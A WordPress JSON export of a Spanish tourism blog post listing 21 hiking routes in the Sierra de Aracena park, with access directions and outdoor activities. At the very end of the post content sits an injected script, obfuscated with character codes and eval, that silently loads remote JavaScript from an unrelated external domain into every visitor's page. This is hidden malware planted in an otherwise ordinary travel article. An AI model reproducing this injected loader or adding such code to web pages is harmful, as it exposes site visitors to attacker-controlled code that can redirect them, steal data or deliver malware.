{"id":1402,"date":"2020-10-06T13:35:41","date_gmt":"2020-10-06T11:35:41","guid":{"rendered":"https:\/\/casadelacorte.evolucion.center\/?p=1402"},"modified":"2021-11-29T13:34:18","modified_gmt":"2021-11-29T12:34:18","slug":"21-rutas-de-senderismo-en-la-sierra-de-aracena","status":"publish","type":"post","link":"https:\/\/casadelacorte.evolucion.center\/?p=1402","title":{"rendered":"21 rutas de senderismo en la Sierra de Aracena."},"content":{"rendered":"\n<p><strong>21 rutas de senderismo en la Sierra de Aracena.<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>200 km de senderos para los amantes de la naturaleza<\/strong><\/h4>\n\n\n\n<p>El turismo activo es una de las maneras m\u00e1s m\u00e1gicas de disfrutar de la naturaleza, gracias al estrecho v\u00ednculo que el viajero establece con el entorno natural visitado. Este contacto permite, adem\u00e1s de gozar de la contemplaci\u00f3n del paisaje, conocer, aprender y practicar deporte. En definitiva, vivir la aventura de sentirse part\u00edcipe de ella.<\/p>\n\n\n\n<p>Una de las caracter\u00edsticas m\u00e1s destacables del Parque Natural Sierra de Aracena y Picos de Aroche, adem\u00e1s de poseer infinidad de parajes naturales, es que re\u00fane las condiciones id\u00f3neas para gozar de esta forma de viajar.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Para caminar<\/h4>\n\n\n\n<p>A lo largo de toda la Sierra existen m\u00e1s de 200 km de senderos de peque\u00f1o y medio recorrido, se\u00f1alizados por la Junta de Andaluc\u00eda y otros 700 km homologados en su mayor\u00eda por la Federaci\u00f3n de Monta\u00f1ismo. La extensa oferta de senderos hace de este espacio natural un para\u00edso para los amantes de la naturaleza.<\/p>\n\n\n\n<p>El caminante del Parque Natural de la Sierra de Aracena y Picos de Aroche puede recorrer rutas que discurren entre milenarias dehesas de encinas, alcornoques, quejigos, \u00e1reas de casta\u00f1os y olivares.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Paseos a caballo y en bici<\/h4>\n\n\n\n<p>Las rutas a caballo son una manera diferente de recorrer este entorno natural. Muy cerca de La Casa de la Corte puedes disfrutar montando a caballo por zonas preciosas en El Chaparral. Pregunta por Charo (666414130). Te har\u00e1 pasar una jornada o unas horas disfrutando del paisaje, paseando por antiguos caminos como tradicionalmente se hac\u00eda cuando no hab\u00eda veh\u00edculos motorizados ni carreteras.<\/p>\n\n\n\n<p>Las bicicletas son otros de los medios con el que, disfrutando de la cercan\u00eda que proporciona esta actividad, podemos recorrer sus caminos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/montar-a-caballo-1024x614.jpg\" alt=\"\" class=\"wp-image-1405\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/montar-a-caballo-1024x614.jpg 1024w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/montar-a-caballo-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/montar-a-caballo-768x461.jpg 768w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/montar-a-caballo.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Escalada y piraguismo<\/h4>\n\n\n\n<p>La pr\u00e1ctica de la escalada (en el Risco de Levante en Santa Ana la Real), el pirag\u00fcismo (en el pantano de Zufre y en el Aracena) son otras posibilidades que se presentan para el disfrute del deporte y la naturaleza en la Sierra de Aracena y Picos de Aroche.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1000\" height=\"600\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/piraguismo.jpg\" alt=\"\" class=\"wp-image-1406\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/piraguismo.jpg 1000w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/piraguismo-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/piraguismo-768x461.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p><strong>Senderos habilitados<\/strong><\/p>\n\n\n\n<p>La Delegaci\u00f3n Provincial de Medio Ambiente de la Junta de Andaluc\u00eda ha acondicionado los siguientes senderos:<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 1: Sendero Puente de los Cabriles<\/h4>\n\n\n\n<p>Los atractivos de este sendero son el propio Puente de los Cabriles, originario del siglo XV y la ribera del M\u00fartiga, el principal cauce del Parque, declarado de inter\u00e9s por la Uni\u00f3n Europea en funci\u00f3n de la diversidad de su fauna. Partiendo de Encinasola, pasaremos un tramo adehesado, otro descendiente de barranco y llegaremos al del valle, surcado por el puente que debe su nombre a las grandes cabezas de carnero empleadas en a base como tajamares.<\/p>\n\n\n\n<p>El acceso a este sendero se encuentra en la salida de Encinasola hacia Cumbres de San Bartolom\u00e9, siguiendo un tramo casi paralelo a la carretera.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"615\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/cigue\u00f1a-negre-1024x615.jpg\" alt=\"\" class=\"wp-image-1407\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/cigue\u00f1a-negre-1024x615.jpg 1024w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/cigue\u00f1a-negre-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/cigue\u00f1a-negre-768x461.jpg 768w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/cigue\u00f1a-negre.jpg 1278w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 2: Sendero Pe\u00f1a de San Sixto<\/h4>\n\n\n\n<p>Encinasola es un territorio de frontera \u2013lo es con Extremadura y Portugal\u2013, rasgo \u00e9ste que se traduce, entre otros, en un habla propia: la marocha.<\/p>\n\n\n\n<p>Para realizar este sendero tomaremos un camino de tierra con muros de piedra, al final de la calle Arrabal Menor en Encinasola, en direcci\u00f3n al Cerro de la Cruz y a Cumbres de San Bartolom\u00e9.<\/p>\n\n\n\n<p>Al principio el camino nos lleva por una zona de huertos familiares y m\u00e1s tarde por una zona de encinas acompa\u00f1adas de abundante matorral.<\/p>\n\n\n\n<p>M\u00e1s tarde atravesaremos el cauce del arroyo del Ca\u00f1o, afluente de la ribera del Silo, en el que podemos encontrar especies como el tamujo, un arbusto espinoso; eucaliptos, adelfas y juncos y algo m\u00e1s tarde divisaremos la pe\u00f1a de origen volc\u00e1nico.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 3: Sendero Cumbres Mayores- Cumbres de Enmedio<\/h4>\n\n\n\n<p>El sendero entre ambas localidades tiene un encanto paisaj\u00edstico considerable ya que se trata de un camino real de dehesas centenarias. Cumbres Mayores tiene fama por sus jamones y chacinas y la emigraci\u00f3n de sus habitantes a Am\u00e9rica. Cumbres de Enmedio tiene unos 50 vecinos, lo que lo convierte en el pueblo m\u00e1s peque\u00f1o de Andaluc\u00eda. Se dice que su origen puede estar en que, originalmente, se trat\u00f3 de un punto de reuni\u00f3n de arrieros.<\/p>\n\n\n\n<p>Accedemos al sendero continuando por la calle que sale del pueblo de Cumbres Mayores a la derecha de la Ermita de la Virgen del Amparo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/zorro-1024x614.jpg\" alt=\"\" class=\"wp-image-1408\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/zorro-1024x614.jpg 1024w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/zorro-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/zorro-768x461.jpg 768w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/zorro.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 4: Camino de la V\u00edbora<\/h4>\n\n\n\n<p>Los empedrados del norte de Hinojales nos conducir\u00e1n por el camino que da nombre a este sendero.<\/p>\n\n\n\n<p>Encinas, cultivos de olivo nos llevan a una dehesa de alcornoques en este corto paseo que podemos prolongar enlazando, al final, con la v\u00eda pecuaria \u201cColada de las Tablas\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n podemos hacer una parada en el pueblo que, originado por las repoblaciones del siglo XV y XVI, parece ser que tom\u00f3 su nombre del hinojo, planta que se usa como condimento y medicina.<\/p>\n\n\n\n<p>El acceso a este sendero se encuentra en el primer camino a la izquierda que encontramos en la carretera que va des- de Hinojales a Ca\u00f1averal de Le\u00f3n, la HV-3122.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 5: Ca\u00f1averal de Le\u00f3n-Ribera de Hinojales<\/h4>\n\n\n\n<p>La orden militar de Le\u00f3n, encargada de consolidar la reconquista cristiana all\u00e1 por el siglo XV, est\u00e1 en el origen de este curioso pueblo y de su nombre, as\u00ed como el de Arroyomolinos. Partiendo del primero, este sendero nos propone un camino que atraviesa primero una zona de dehesas de encinas y alcornoques de considerable porte y de huertos, algunos de los cuales est\u00e1n cerrados con el cierre conocido como portera \u2013 cuyo origen est\u00e1 tambi\u00e9n en las tierras leonesas.<\/p>\n\n\n\n<p>El acceso al sendero se encuentra en el camino que hay a la izquierda del cementerio de Ca\u00f1averal de Le\u00f3n, al que se accede por la calle Maestro Nacional Don Carmelo Romero de esta localidad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"600\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/b\u00faho-real.jpg\" alt=\"\" class=\"wp-image-1409\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/b\u00faho-real.jpg 1000w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/b\u00faho-real-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/b\u00faho-real-768x461.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 6: Sendero Alto del Bujo<\/h4>\n\n\n\n<p>Este sendero parte del pueblo de Arroyomolinos de Le\u00f3n y asciende por el camino antiguo de El Bujo que, a veces, tiene mucha pendiente y, en sus inicios, est\u00e1 flanqueado por encinas y alcornoques. Olivares y matorral se suceden hasta alcanzar la parte alta de la Sierra del<\/p>\n\n\n\n<p>Bujo donde la perspectiva es de sierras y dehesas. Algo m\u00e1s arriba podremos descansar en el \u00e1rea recreativa Alto del Bujo y coronar el camino asom\u00e1ndonos al Mirador del mismo nombre.<\/p>\n\n\n\n<p>Para acceder al sendero debemos situarnos en la traves\u00eda de Arroyomolinos, a la altura del puente sobre el arroyo del Ca\u00f1uelo y salir por la calleja que va paralela al arroyo abajo que contin\u00faa por una pista hasta una encrucijada de caminos.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 7: Sendero Sierra de los Gabrieles<\/h4>\n\n\n\n<p>Se trata de una sierra lineal muy definida a que accederemos desde un camino que sale de Arroyomolinos de Le\u00f3n. Ah\u00ed empieza el sendero que atraviesa una ribera y un tramo de umbr\u00eda hasta alcanzar el collado de la sierra. Desde ah\u00ed podremos contemplar hacia el sur un amplio paisaje de dehesas y, por otro, a la solana, grandes fincas con cortijos dedicados a la actividad agraria.<\/p>\n\n\n\n<p>El inicio del sendero se encuentra a la entrada de Arroyomolinos de Le\u00f3n, viniendo desde Cala; junto al acceso a la carretera HV-3122 que conduce a Ca\u00f1averal de Le\u00f3n.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 8: Sendero El Talenque-Valdelarco<\/h4>\n\n\n\n<p>Encaramado a una peque\u00f1a ladera nos encontramos con Valdelarco, un peque\u00f1o pueblo punto final de este sendero cuyo recorrido se inicia en la aldea El Talenque de Navahermosa. Nos llevar\u00e1 despu\u00e9s por bosques centenarios de alcornoques, encinas y casta\u00f1os, el bosque de galer\u00eda que ampara el arroyo de Navahermosa y su transformaci\u00f3n en una zona de huertas, manzanos y nogales, se\u00f1al inequ\u00edvoca de la cercan\u00eda de la poblaci\u00f3n.<\/p>\n\n\n\n<p>Saliendo de la aldea de Navahermosa (al este de Galaroza) en direcci\u00f3n a Valdelarco, a unos 500 metros y junto al \u00c1rea Recreativa que lleva el mismo nombre se sit\u00faa la se\u00f1al de inicio del sendero.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/\u00e1guila-real-1024x614.jpg\" alt=\"\" class=\"wp-image-1410\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/\u00e1guila-real-1024x614.jpg 1024w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/\u00e1guila-real-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/\u00e1guila-real-768x461.jpg 768w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/\u00e1guila-real.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 9: Sendero Ribera de Jabugo<\/h4>\n\n\n\n<p>Este sendero une una localidad con gran encanto, Galaroza, con Casta\u00f1o del Robledo a trav\u00e9s de una zona de ribera, alimenta- da por el r\u00edo M\u00fartiga, que recibe el nombre de Ribera de Jabugo, cauce cuyo nombre, igual que el del pueblo, se debe a los bosques de sa\u00faco existentes en la zona. La gran diversidad vegetal y lo exuberante de la vegetaci\u00f3n convierten este itinerario en uno de los m\u00e1s representativos y espectaculares del Parque Natural.<\/p>\n\n\n\n<p>La se\u00f1al de inicio se encuentra en una calleja que sale a la derecha en la traves\u00eda de la N-433 por Galaroza, en direcci\u00f3n Aracena, un poco despu\u00e9s del Hostal Venecia.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 10: Sendero al Cerro de San Crist\u00f3bal<\/h4>\n\n\n\n<p>El sendero se inicia a la salida de Almonas- ter la Real, pueblo dominado por un con- junto monumental compuesto del castillo, iglesia y, especialmente, una mezquita que merecen una visita. El camino, algo duro dada la subida, nos llevar\u00e1 por una zona de antiguas construcciones \u2013molinos\u2013, de barrancos, casta\u00f1os y la de la cima del Cerro de San Crist\u00f3bal (917 metros). All\u00ed, antes de regresar, podemos detenernos en alguno de sus dos magn\u00edficos miradores.<\/p>\n\n\n\n<p>El inicio del sendero se encuentra en Almonaster la Real, en la traves\u00eda de la carretera A-482, saliendo hacia Santa Ana la Real, junto a la venta \u201cLa Palmera\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/ciervos-1024x614.jpg\" alt=\"\" class=\"wp-image-1411\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/ciervos-1024x614.jpg 1024w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/ciervos-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/ciervos-768x461.jpg 768w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/ciervos.jpg 1275w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 11: Sendero Casta\u00f1o del Robledo- Puente de los Casares<\/h4>\n\n\n\n<p>Casta\u00f1o del Robledo es un peque\u00f1o pueblo fundado en el siglo XVI. Su nombre se debe al \u00e1rbol m\u00e1s frecuente, fuente de recursos en la zona y emblema del Parque Natural y, por otro lado, al que era el bosque primitivo: un robledal. Veremos viejos casta\u00f1ares a la salida del pueblo, bonitas panor\u00e1micas y, tras acusadas pendientes, el barranco de Casares. Si vamos en \u00e9pocas de lluvias, vale la pena consultar c\u00f3mo acceder a un espectacular salto de agua pr\u00f3ximo, los Chorros de Ollarancos.<\/p>\n\n\n\n<p>Si entramos a Casta\u00f1o de Robledo por el segundo acceso viniendo de Fuenteheridos, nos encontramos la se\u00f1al de inicio del sendero justo antes de entrar en el pueblo.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 12: Sendero Rodeo al Cerro del Casta\u00f1o<\/h4>\n\n\n\n<p>Parte este sendero del pueblo de Casta\u00f1o del Robledo para iniciar el camino que rodea el punto m\u00e1s alto de la Sierra; el Cerro del Casta\u00f1o (962 m). \u00c9ste discurre en un gran bosque de antiguos casta\u00f1os, al que acompa\u00f1an otra variada sinfon\u00eda de arbustos. El casta\u00f1o, que requiere unas condiciones de humedad y altitud similares a las de los robles tambi\u00e9n presentes en el sendero, tiene gran vistosidad ya que su aspecto var\u00eda considerablemente en cada estaci\u00f3n.<\/p>\n\n\n\n<p>Situ\u00e1ndonos en la Plaza del \u00c1lamo, donde se encuentra el Ayuntamiento, si tomamos la calle de la derecha que sube a la parte alta de la localidad de Casta\u00f1o del Robledo nos encontraremos con el inicio de este sendero.<\/p>\n\n\n\n<p><div class=\"oceanwp-oembed-wrap clr\"><blockquote class=\"wp-embedded-content\" data-secret=\"HAh2EhGGxF\"><a href=\"https:\/\/casadelacorte.evolucion.center\/?page_id=76\">C\u00f3mo llegar y qu\u00e9 hacer<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"\u00abC\u00f3mo llegar y qu\u00e9 hacer\u00bb \u2014 Casa de la Corte\" src=\"https:\/\/casadelacorte.evolucion.center\/?page_id=76&#038;embed=true#?secret=HAh2EhGGxF\" data-secret=\"HAh2EhGGxF\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/div><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 13: Sendero Ribera de Al\u00e1jar-Los Molinos<\/h4>\n\n\n\n<p>Este sendero discurre en paralelo a la Ribera de Al\u00e1jar, curso cuya agua fue aprovechada en el pasado para moler el grano mediante la construcci\u00f3n de unos simples pero eficaces ingenios: los molinos harineros de ribera. Al final del recorrido, podremos disfrutar de una excelente panor\u00e1mica de la Ribera de Al\u00e1jar desde el mirador del mismo nombre.<\/p>\n\n\n\n<p>Para iniciar el sendero debemos tomar un camino que sale del casco urbano de Al\u00e1jar en direcci\u00f3n sur, inicialmente hacia el cementerio, y al que se accede por la calle San Bartolom\u00e9, pasando el antiguo cuartel de la Guardia Civil.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 14: Sendero Los Madro\u00f1eros<\/h4>\n\n\n\n<p>Los Madro\u00f1eros es el nombre de una de las aproximadamente treinta aldeas que quedan hoy en el Parque. Estos peque\u00f1os poblados tienen sus origen en la colonizaci\u00f3n de la sierra siglo atr\u00e1s y, especialmente, en la b\u00fasqueda de zonas f\u00e9rtiles, en las que poder cultivar huertos y frutales. Alcornoques y muretes de piedra nos llevar\u00e1n hasta la aldea de Los Madro\u00f1eros, una de las mejor conservadas y, excepcionalmente, ha- bitada en verano.<\/p>\n\n\n\n<p>Este sendero a la aldea de Los Madro\u00f1eros parte, en direcci\u00f3n sureste, de la zona del pueblo de Al\u00e1jar, conocida como El Nogalejo, junto a un molino de aceite en desuso.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"600\" src=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/comadreja.jpg\" alt=\"\" class=\"wp-image-1404\" srcset=\"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/comadreja.jpg 1000w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/comadreja-300x180.jpg 300w, https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/comadreja-768x461.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 15: Sendero Fuenteheridos-Aracena<\/h4>\n\n\n\n<p>Este sendero parte a unos 840 metros de un bello pueblo cuyo nombre es una evoluci\u00f3n de las voces leonesas \u201cFonte\u201d, manantial, \u201cFerido\u201d, la fuente del turno de riego. El paisaje en el inicio es el de las huertas trabajadas por la abundancia del agua de la zona. Despu\u00e9s encontraremos algunos pies de roble, pero, sobre todo, los famosos casta\u00f1ares de la Sierra. La presencia del casta\u00f1o convierte en distinto este recorrido en cada estaci\u00f3n. En invierno, veremos grandes \u00e1rboles sin hojas; en verano, hojas verdes y en oto\u00f1o, de color cobrizo.<\/p>\n\n\n\n<p>El acceso a este sendero se encuentra en la carretera N-433, en el punto kilom\u00e9trico 96,7, a la derecha en sentido Portugal, unos 350 metros despu\u00e9s del primer desv\u00edo a Fuenteheridos.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 16: Alto del Chorrito<\/h4>\n\n\n\n<p>Los Marines, punto de inicio del sendero, debe su nombre a los repobladores gallegos de apellido Mar\u00edn que colonizaron esta zona en el siglo XVI. Casta\u00f1os, alcornoques y peque\u00f1as huertas con olivos nos marcan un sendero que m\u00e1s adelante discurre entre muros de piedras poblados de helechos.<\/p>\n\n\n\n<p>La umbr\u00eda deja paso al matorral de solana y algo m\u00e1s adelante un afloramiento de roca, un peque\u00f1o salto de agua que da nombre al sendero y la vista panor\u00e1mica de las sierras orientales de Linares.<\/p>\n\n\n\n<p>Comienza el sendero en la N-433, a la derecha de la cantera que se sit\u00faa a la altura de la segunda salida a Los Marines en sentido Portugal.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 17: Sendero Linares de la Sierra &nbsp;&#8211; &nbsp;Al\u00e1jar<\/h4>\n\n\n\n<p>Este sendero une por el puerto de Linares las localidades de Linares y Al\u00e1jar. Esta \u00faltima significa en \u00e1rabe \u201cla piedra\u201d y parece que su origen est\u00e1 en la Pe\u00f1a de Arias Montano, que domina el pueblo. Viajeros, eremitas y eruditos se han sentido atra\u00eddos por la belleza y la singularidad de este enclave, al que se le atribuyen poderes m\u00e1gicos. La espada\u00f1a y las garitas blancas distinguen la zona en la que culmina cada 8 de diciembre la Romer\u00eda m\u00e1s afamada de la Sierra.<\/p>\n\n\n\n<p>Encontramos la se\u00f1al de inicio de este sendero tomando el camino que conduce al cementerio de Linares de la Sierra, pocos metros despu\u00e9s de las \u00faltimas casas de esta localidad.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 18: Sendero Aracena-Linares de la Sierra<\/h4>\n\n\n\n<p>Parte este sendero de Aracena, antigua cabeza de partido de la comarca, para recorrer parte del valle hasta la vecina localidad de Linares de la Sierra, que debe su nombre al antiguo cultivo de lino en sus proximidades.<\/p>\n\n\n\n<p>El paisaje que nos acompa\u00f1ar\u00e1 al inicio est\u00e1 configurado por huertos y dehesas de encinas dedicadas a la producci\u00f3n de bellotas para el ganado porcino.<\/p>\n\n\n\n<p>El acceso a esta ruta lo encontraremos en la salida de Aracena por la carretera A-470 en direcci\u00f3n a Al\u00e1jar, junto a la Piscina Municipal.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 19: Sendero Aracena \u2013 Corteconcepci\u00f3n por la Fuente del Rey<\/h4>\n\n\n\n<p>Fuente del Rey es como se llama el arroyo cercano a Aracena que seguiremos durante la mayor parte del sendero. Quejigos y un denso matorral marcan el camino descendiente hasta la Fuente del Rey, donde podemos detenernos un momento antes de continuar el descenso por huertas de frutales, olivos y bosque de ribera compuesto por \u00e1lamos negros y eucaliptos. M\u00e1s adelante, ya en la falda de una peque\u00f1a loma, obtenemos una buena vista del valle.<\/p>\n\n\n\n<p>Para acceder al este sendero debemos tomar la carretera Aracena &#8211; Carbonera y, partiendo de la primera localidad, recorrer unos 500 metros, donde se sit\u00faa la se\u00f1al de inicio.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Ruta 20: Sendero Camino de las Tobas<\/h4>\n\n\n\n<p>La se\u00f1al nos muestra el inicio de este muy corto sendero que es parte del camino que une Higuera de la Sierra con Zufre. A lo largo del mismo nos encontraremos con pilares que suelen ser utilizados como abrevaderos por el ganado. Si continuamos el camino llegaremos a las tobas.<\/p>\n\n\n\n<p>La disoluci\u00f3n del carbonato de la roca y su filtrado en la pared crea una pel\u00edcula fina con esa denominaci\u00f3n. En \u00e9stas, se dice que hay una imagen de la Virgen, lo que hace que el lugar sea muy visitado.<\/p>\n\n\n\n<p>Para acceder al sendero debemos tomar la pista conocida como Camino de Higuera a la Lancha, y tras recorrer uno 1.600 metros encontraremos la se\u00f1al de inicio.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Ruta 21: Sende<\/strong>r<strong>o Minas de Teuler<\/strong><\/h4>\n\n\n\n<p>Las minas de Teuler son el testimonio de la riqueza mineral de Santa Olalla, Santa Eulalia en gallego y bable. Estos dos puntos se unen en un largo sendero que tiene uno de sus principales atractivos en las vistas panor\u00e1micas que se divisan una vez rodeado el cerro del Viso (680 m). Desde ah\u00ed, puede observarse un amplio valle al final del cual est\u00e1 la ribera del Cala, las sierras pacenses pr\u00f3ximas y, m\u00e1s cerca, el barranco de Teuler.<\/p>\n\n\n\n<p>La se\u00f1al de inicio del sendero se encuentra junto al castillo de Santa Olalla del Cala situado sobre el cerro que corona esta localidad.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><em>Fuente: Gu\u00eda del Parque Natural Sierra de Aracena y Picos de Aroche y su entorno. 2008. Junta de Andaluc\u00eda. Consejer\u00eda de Turismo, Comercio y Deporte<\/em><\/p>\n\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-evolucion-center\"><div class=\"wp-block-embed__wrapper\">\n<div class=\"oceanwp-oembed-wrap clr\"><blockquote class=\"wp-embedded-content\" data-secret=\"vgWGQhRe9H\"><a href=\"https:\/\/evolucion.center\/la-casa-de-la-corte\/\">La Casa de la Corte<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"\u00abLa Casa de la Corte\u00bb \u2014 EVOLUCION.CENTER\" src=\"https:\/\/evolucion.center\/la-casa-de-la-corte\/embed\/#?secret=vgWGQhRe9H\" data-secret=\"vgWGQhRe9H\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/div>\n<\/div><\/figure>\n<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*674867468*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>21 rutas de senderismo en la Sierra de Aracena. 200 km de senderos para los amantes de la naturaleza El turismo activo es una de las maneras m\u00e1s m\u00e1gicas de disfrutar de la naturaleza, gracias al estrecho v\u00ednculo que el viajero establece con el entorno natural visitado. Este contacto permite, adem\u00e1s de gozar de la 